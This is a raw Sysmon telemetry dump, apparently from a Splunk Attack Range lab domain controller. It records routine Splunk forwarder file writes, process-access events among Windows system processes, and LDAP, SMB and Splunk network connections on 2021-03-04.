Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=291E092B4F7AA83B4E0FAB3AA37924AE,SHA256=54251107EC57CEE763479942F743E9272D32F2B03593F0E5FDE7D08B58ED25E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200527Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.616{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7324E55A38B376B0DB6E0F02B9797D7F,SHA256=B5D82E825BB4BBCF3C6B32BCEC16FABD0A7BE40B89AF54D9196F51C57814994F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200526Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.506{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002200525Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E67B-6040-E14D-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200524Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200523Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200522Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200521Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200520Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E67B-6040-E14D-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200519Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.475{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E67B-6040-E14D-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200518Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.476{5ABCFE62-E67B-6040-E14D-00000000AD01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200517Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.350{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAB30BE51586F09922278F1BDFF234E4,SHA256=C5E2029DE2D10A2FEE6C9A1760F735C234AC68B4B6BFFCB220B7D4E603173D09,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200535Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.347{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55136-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002200534Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.347{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55136-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002200533Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.243{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-228.attackrange.local55135-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002200532Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.243{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55135-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002200531Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.237{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55134-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002200530Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.237{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55134-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002200529Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:04.631{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFC74714C0907221032122682DB1486A,SHA256=7F91C52C90834E451E36404B91FE102EC52B3B1F72FF5290F5DF4CC96C59510E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200528Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:04.428{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06232E05B27272A559F853A4DA8779D6,SHA256=036D172C1A967266FEDC3D4AE01B2B3A7EA648FE50DDACAD400704FC9F4799C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200536Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:05.647{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB967E56475BB789805913CB6FEA7A9,SHA256=C9915AAFE050E41C2FE976F0D3F79F6467C62E4972356868F307958E9579533B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200538Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:06.725{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200537Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:06.663{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDB0AFA871C17E9128BD3DE5283815B5,SHA256=855CE7031C757B7125EC6666247EE6F812D5C653C01466D49BA7B969A6CA8A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200540Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:07.663{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FEAB5AB609DFC5836372C1F507EDC52,SHA256=B46D29A35F6C3E02475BACCE8C67A7D218D5937F2E5FE7499CC9E75F1E422A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200539Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:07.147{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2C2AD4AC1576AD2DE658A3BBE514746A,SHA256=36929499FB8DCBDA6A5E469AA739A9E7B84B5D306DA8CDCE98449A505285D8EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200544Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:08.678{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA924401D61537F273C7A3A407378126,SHA256=CEB9183AA0EAA8AACB63BA08CAE4016CCF0EB3BEC417F84842EFD9DA36DE7EE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200543Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:08.397{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AA1649E06962E4733CA48AF6BAA9078,SHA256=826D0FAF8AE7AE448A6DC3E884D71216A2E48689FC33EF32C588772D2D776599,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200542Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:04.547{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55138-false10.0.1.12-8089- 354300x80000000000000002200541Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:03.985{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55137-false10.0.1.12-8000- 23542300x80000000000000002200545Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:09.694{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A326E811CEF478548972194EC5463A,SHA256=A822D2871EBEFEA6486EABF31504090E8559A6980A69B75E351AA77F2C3FB19D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200546Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:10.709{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=683127140CB7DC6821D8B913588D81BE,SHA256=1492FFF1176967BA85B211FDB91D95FF12BBD6D58C5209D758A864572C9B8551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200548Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:11.725{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA6C029E7A5670DD5FE3ADA77F8061F,SHA256=11B26A4CDCA3CCD98173002CD44058CE4D1DF3AAC3C8D70CE787AD3F0CEF3F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200547Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:11.475{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1D08623B0F99D0F58B7890A69E08EA4,SHA256=A7721D4733AFB154F2F217B6B68C5220B065721135D30972CE80E8F955EE7AF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200549Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:12.741{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80E14685C91A9CA44E39DA1F60B9483B,SHA256=CDCC44341CC3568D38EEC9EF7C9810BA62622424BBC37CDCA9C2A5C3C92B9CEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200551Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:13.756{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2965768911000C679685CDC455D36A9,SHA256=9071D0077C8906714EE6543639F6B7A017BA5BCBEA87C8DF6D8BD5529B40EB94,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200550Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:09.047{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55139-false10.0.1.12-8000- 23542300x80000000000000002200552Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:14.772{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C11FA216956C1C578368B808BD74CEC,SHA256=33AE866C3111159C876198D1EA82695C822EBE65330BBA99582A1E5904A0893A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200554Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:15.788{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A23BA0ADD43E8F1B5303410AAA838D4,SHA256=29366586A4B728946AF7E17969E293666279337BB24A748566F0336B3DDBE2B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200553Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:15.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FC85C1DFBA8156AE5F47BBD8F78097F,SHA256=93856E707139C65DD7CFDA522D0A1BC4F69F3C21757B2457224BDC25BF96FEB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200555Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:16.803{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D0D60B30B7539A6B0A655CBFBB7D50E,SHA256=BB124AFAEB9F53EA7F673DCF2E6206D24CE152770C5857D0F783E3042BAF054F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200566Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.819{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE03F021B60F7E980A002E24BB1666A,SHA256=D03841BD8EEAFD62C57135904F8B3305E7449536E0658A40B88DB15F06CB1B12,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200565Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.678{5ABCFE62-E689-6040-E24D-00000000AD01}37647000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200564Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.553{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E689-6040-E24D-00000000AD01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200563Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.553{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200562Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 